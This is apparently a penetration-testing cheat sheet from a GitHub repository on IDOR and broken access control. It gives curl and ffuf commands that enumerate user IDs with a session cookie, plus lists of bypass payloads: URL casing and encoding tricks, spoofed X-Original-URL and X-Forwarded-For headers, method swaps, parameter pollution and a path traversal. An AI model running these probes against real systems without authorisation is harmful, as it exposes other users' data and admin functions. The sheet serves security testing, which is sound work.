Skip to content

7.10.IDOR-Access-Control.md

Latest commit

 

History

History
285 lines (210 loc) · 5.2 KB

7.10.IDOR-Access-Control.md

File metadata and controls

285 lines (210 loc) · 5.2 KB

IDOR & Access Control

Table of Contents

IDOR (Insecure Direct Object Reference)

Quick Check (One-liner)

# Quick IDOR test
for i in $(seq 1 10); do curl -s "https://$rhost/api/user/$i" -H "Cookie: $cookie"; done | grep -v "403\|401"

Common IDOR Parameters

id=
user_id=
account=
number=
order=
doc=
key=
email=
group=
profile=
edit=
report=
file=

Testing Examples

# Original request
GET /api/user/profile?id=123

# Test IDOR
GET /api/user/profile?id=124
GET /api/user/profile?id=1
GET /api/user/profile?id=0

In URLs

/user/123/profile → /user/124/profile
/order/1001 → /order/1002
/invoice/INV-001 → /invoice/INV-002
/download?file=report_123.pdf → /download?file=report_124.pdf

In Request Body

// Original
{"user_id": 123, "action": "view"}

// Test
{"user_id": 124, "action": "view"}
{"user_id": 1, "action": "view"}

In Headers

X-User-Id: 123 → X-User-Id: 124
Cookie: user=123 → Cookie: user=124

Broken Access Control

Privilege Escalation

Horizontal

# Same privilege level, different user
User A accessing User B's data

Vertical

# Lower privilege accessing higher privilege functions
Regular user accessing admin functions

Common Vulnerabilities

Missing Function Level Access Control

# User endpoint
GET /api/user/profile

# Admin endpoint (should be protected)
GET /api/admin/users
POST /api/admin/user/delete

Bypassing Access Control via URL

/admin → /Admin
/admin → /ADMIN
/admin → /admin/
/admin → /admin//
/admin → /.admin
/admin → /admin.html
/admin → /admin.php
/admin → /admin%20
/admin → /admin%09
/admin → /admin%00

Via HTTP Method

GET /admin/delete → Blocked
POST /admin/delete → Allowed?
PUT /admin/delete → Allowed?
OPTIONS /admin/delete → Check allowed methods

Via Headers

X-Original-URL: /admin/delete
X-Rewrite-URL: /admin/delete
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
X-Custom-IP-Authorization: 127.0.0.1

Testing Techniques

Using Burp Suite

  1. Log in as User A
  2. Capture requests containing user identifiers
  3. Send to Repeater
  4. Modify identifiers to User B's values
  5. Check if access is granted

Autorize Extension

  1. Install Autorize in Burp
  2. Log in as low-privilege user
  3. Copy cookies to Autorize
  4. Browse as high-privilege user
  5. Autorize will test each request with low-privilege cookies

Using cURL

# Save cookies from login
curl -c cookies.txt -X POST http://$rhost/login -d "user=admin&pass=xxx"

# Access other user's resource
curl -b cookies.txt http://$rhost/api/user/124/profile

Fuzzing IDs

# Using ffuf
ffuf -w numbers.txt -u "http://$rhost/api/user/FUZZ/profile" -H "Cookie: session=xxx" -mc 200

# Generate number list
seq 1 1000 > numbers.txt

UUID/GUID Testing

# Original
550e8400-e29b-41d4-a716-446655440000

# Test patterns
550e8400-e29b-41d4-a716-446655440001
00000000-0000-0000-0000-000000000000
ffffffff-ffff-ffff-ffff-ffffffffffff

Bypass Methods

Encoded Values

id=123 → id=124
id=123 → id=0x7C (hex)
id=123 → id=MTI0 (base64 of "124")

Wrapped Values

{"id": 123} → {"id": [123]}
{"id": 123} → {"id": {"$eq": 124}}
{"id": 123} → {"id": "123"}

Parameter Pollution

?id=123 → ?id=123&id=124
?id=123 → ?id=124&id=123

Changing Content-Type

Content-Type: application/x-www-form-urlencoded
→ Content-Type: application/json

user_id=123 → {"user_id": 124}

Using Wildcards

/api/user/*/profile
/api/user/../admin/profile

Case Sensitivity

/User/123 → /user/123
/USER/123 → /user/123

Common IDOR Scenarios

Scenario Original Test
View profile /user/123 /user/124
Download file /download?id=abc /download?id=abd
Edit account POST /edit {"user_id": 1} POST /edit {"user_id": 2}
Delete item DELETE /item/100 DELETE /item/101
View order /order/ORD-001 /order/ORD-002
API endpoint /api/v1/users/me /api/v1/users/1

Payload Cheat Sheet

Technique Example
Sequential ID id=123 → id=124
Predictable format ORD-001 → ORD-002
UUID manipulation Change last digit
Parameter pollution ?id=1&id=2
Encoded value id=MTI0 (base64)
JSON array {"id": [124]}
HTTP method GET → POST
Header bypass X-Original-URL: /admin

📚 See Also

Related Web Attacks